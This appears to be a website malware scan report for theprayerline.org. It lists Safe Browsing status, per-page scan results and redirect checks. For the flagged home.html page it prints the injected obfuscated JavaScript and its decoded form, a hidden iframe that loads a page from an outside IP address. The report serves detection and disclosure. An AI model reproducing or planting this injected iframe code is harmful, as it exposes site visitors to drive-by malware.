Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theprayerline.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://theprayerline.org/ | 200 OK Content-Length: 1353 Content-Type: text/html | clean |
https://count.carrierzone.com/app/count_server/count.js | 200 OK Content-Length: 36029 Content-Type: text/javascript | clean |
http://theprayerline.org/intro.html | 200 OK Content-Length: 5607 Content-Type: text/html | clean |
http://theprayerline.org/s/nav.js | 200 OK Content-Length: 1065 Content-Type: application/javascript | clean |
http://theprayerline.org/home.html | 200 OK Content-Length: 5609 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v4765b8a522c6f(v4765b8a52301f){ function v4765b8a523416 () {var v4765b8a52381c=16; return v4765b8a52381c;} return(parseInt(v4765b8a52301f,v4765b8a523416()));}function v4765b8a523c10(v4765b8a52400a){ function v4765b8a524c15 () {return 2;} var v4765b8a524406='';for(v4765b8a524802=0; v4765b8a524802<v4765b8a52400a.length; v4765b8a524802+=v4765b8a524c15()){ v4765b8a524406+=(String.fromCharCode(v4765b8a522c6f(v4765b8a52400a.substr(v4765b8a524802, v4765b8a524c15()))));}return v4765b8a524406;} document.write(v4765b8a523c10('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3735613237386262336563207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3235363730292B27613235376361315C272077696474683D3835206865696768743D333032207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); Decoded script: <SCRIPT>window.status='Done';document.write('<iframe name=75a278bb3ec src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*25670)+'a257ca1\' width=85 height=302 style=\'display: none\'></iframe>')</SCRIPT> Antivirus reports:
| ||
http://theprayerline.org/calendar.html | 200 OK Content-Length: 5085 Content-Type: text/html | clean |
http://theprayerline.org/contactus.html | 200 OK Content-Length: 4262 Content-Type: text/html | clean |
http://theprayerline.org/whoweare.html | 200 OK Content-Length: 5553 Content-Type: text/html | clean |
http://theprayerline.org/howitworks.html | 200 OK Content-Length: 5486 Content-Type: text/html | clean |
http://theprayerline.org/ouradvantage.html | 200 OK Content-Length: 7991 Content-Type: text/html | clean |
http://theprayerline.org/Scripts/AC_RunActiveContent.js | 404 Not Found Content-Length: 228 Content-Type: text/html | clean |
http://theprayerline.org/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://theprayerline.org/joinnow.php | 200 OK Content-Length: 6022 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: theprayerline.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 16:37:50 GMT
Vary: Accept-Encoding, User-Agent
Content-Length: 1353
Content-Type: text/html
Last-Modified: Sat, 17 Oct 2009 15:44:50 GMT
Set-Cookie: TS0194eee0=010bd7804492e34807b23aeb2f0f73f5d10be9810408eb9077c5b8236836426644f060be36; Path=/
...1353 bytes of data.
GET / HTTP/1.1
Host: theprayerline.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 16:37:50 GMT
Vary: Accept-Encoding, User-Agent
Content-Length: 1353
Content-Type: text/html
Last-Modified: Sat, 17 Oct 2009 15:44:50 GMT
Set-Cookie: TS0194eee0=010bd7804492e34807b23aeb2f0f73f5d10be9810408eb9077c5b8236836426644f060be36; Path=/
...1353 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: theprayerline.org
Referer: http://www.google.com/search?q=theprayerline.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: theprayerline.org
Referer: http://www.google.com/search?q=theprayerline.org
Result:
The result is similar to the first query. There are no suspicious redirects found.